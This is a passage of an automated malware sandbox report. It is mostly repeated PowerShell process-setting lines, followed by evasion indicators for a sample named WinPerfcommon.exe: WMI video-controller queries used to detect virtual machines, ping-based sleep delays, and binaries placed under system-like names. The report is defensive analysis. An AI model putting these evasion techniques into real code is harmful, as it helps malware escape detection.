                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Uses ping.exe to sleep
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: 1A960000 memory reserve | memory write watchJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 1B280000 memory reserve | memory write watchJump to behavior
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: AF0000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 1A5F0000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exeMemory allocated: 30C0000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exeMemory allocated: 1B180000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exeMemory allocated: 1280000 memory reserve | memory write watch
                              Source: C:\Recovery\SgrmBroker.exeMemory allocated: 1AF30000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 1160000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 1AC70000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 1280000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 1B0F0000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exeMemory allocated: 2900000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exeMemory allocated: 1AA80000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exeMemory allocated: 1460000 memory reserve | memory write watch
                              Source: C:\Recovery\SystemSettings.exeMemory allocated: 1AFC0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: CE0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: 1A750000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: 1510000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeMemory allocated: 1B350000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 1340000 memory reserve | memory write watch
                              Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exeMemory allocated: 1B0E0000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 12D0000 memory reserve | memory write watch
                              Source: C:\Program Files\Adobe\StartMenuExperienceHost.exeMemory allocated: 1AF60000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\WinPerfcommon.exeThread delayed: delay time: 922337203685477Jump to behavior
